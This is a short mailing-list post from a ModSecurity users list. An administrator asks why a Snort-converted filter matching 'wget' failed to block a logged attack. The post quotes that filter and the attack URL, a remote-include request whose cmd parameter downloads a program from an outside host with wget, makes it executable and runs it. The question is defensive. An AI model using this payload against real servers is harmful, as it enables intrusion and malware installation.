[mod-security-users] Problem with snort rules

SourceForge Headquarters 1320 Columbia Street Suite 310 San Diego, CA 92101 +1 (858) 422-6466

I am working on getting my filters configured for a number of webservers.  I
used a few filters I found in the snort filters that were converted.
However, upon further investigation, it didn't yield what I was looking for.
Here is the one I think should be tripped:

# WEB-ATTACKS wget command attempt
SecFilter "wget\x20"

Here is a real url (slightly modified) that was used to attack a server.

http://someplace.com?basepath=http://www.wsar.hpg.ig.com.br/dcphp3.gif?&amp;
cmd=cd%20/tmp;wget%20http://hac10.tripod.com.br/cgi;chmod%20711%20cgi;./cgi

 I would have expected the wget filter above to block it.  Can anyone help
me understand why the filter above doesn't block wget?  Am I missing the
point?  Please be gentle.  Thanks.